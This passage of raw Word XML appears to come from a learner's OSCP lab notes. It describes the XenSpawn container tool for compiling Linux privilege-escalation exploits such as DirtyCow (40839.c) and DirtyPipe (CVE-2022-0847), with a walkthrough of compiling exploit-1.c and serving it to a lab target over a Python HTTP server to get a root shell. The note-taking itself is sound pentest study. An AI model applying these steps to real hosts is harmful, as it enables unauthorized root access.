        <w:t xml:space="preserve">One quick fix (as shown below) is to add the -static flag. But there are some cases where the static files are too big, or your binary needs NSS (name services like DNS, LDAP), PAM, or other plugins that </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">must be dynamically linked</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, then -static breaks them.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035A9">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035AA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, XenSpawn is a tool that creates a new environment that you can run gcc in and fix the compatibility problems.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035AB">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035AC">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Install it:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035AD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="973"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git clone </w:t>
      </w:r>
      <w:hyperlink r:id="rId1147">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="ff0000"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/X0RW3LL/XenSpawn.git</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035AE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="973"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd XenSpawn/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035AF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="973"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +x </w:t>
      </w:r>
      <w:hyperlink r:id="rId1148">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="ff0000"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">spawn.sh</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035B0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035B1">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use it:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="701"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd XenSpawn/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="973"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo ./spawn.sh &lt;MACHINE_NAME&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="973"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace it your own name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="973"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo systemd-nspawn -M &lt;MACHINE_NAME&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035B6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="973"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then, you can run your gcc commands:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035B7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="973"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gcc -pthread 40839.c -o dirty -lcrypt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035B8">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035B9">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to exit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035BA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="447"/>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35BB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035BC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035BD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_4wa6axc044q9" w:id="482"/>
      <w:bookmarkEnd w:id="482"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Xenspawn walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035BE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035BF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I tested xenpawn on OSCP-B .149 using the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1149">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">CVE-2022-0847-DirtyPipe-Exploits</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Before, I had to add the -static to fix it, and even when I did that, it couldn't open the shell but it did reset the password of root user. But, when I tried with xenspawn, it did the exploit fully, including opening a root shell. So xenspawn definitely does a lot better than just slapping on static flag.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035C0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1169"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First, you need to open a root shell in Kali</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035C2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1169"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -i</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035C3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1169"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd XenSpawn/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1169"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo ./spawn.sh xenial</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1169"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Create a container called xenial</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035C6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1169"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo systemd-nspawn -M</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1169"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Start a session in xenial</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1169"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now, I am working in</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /var/lib/machines/xenial</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, but I want to go to root directory in the xenial container, so inside the session I just go to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">~</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/lib/machines/xenial/root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035C9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1169"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd ~</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035CA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1169"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now, you can't download files while inside of the container, so go to your kali terminal, go to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/lib/machines/xenial/root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and download the exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035CB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1169"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now, inside of the xenial session, you can run gcc without static</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1169"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gcc exploit-1.c -o exploit-1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035CD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1169"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then, you can exit session</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1169"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035CF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1169"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In your kali, while still inside of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/lib/machines/xenial/root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, start python listener and upload to target</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035D0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1169"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -m http.server 80</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035D1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035D2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035D3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_yw0v0dqkxusx" w:id="483"/>
      <w:bookmarkEnd w:id="483"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-static vs. dynamically linked</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035D4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
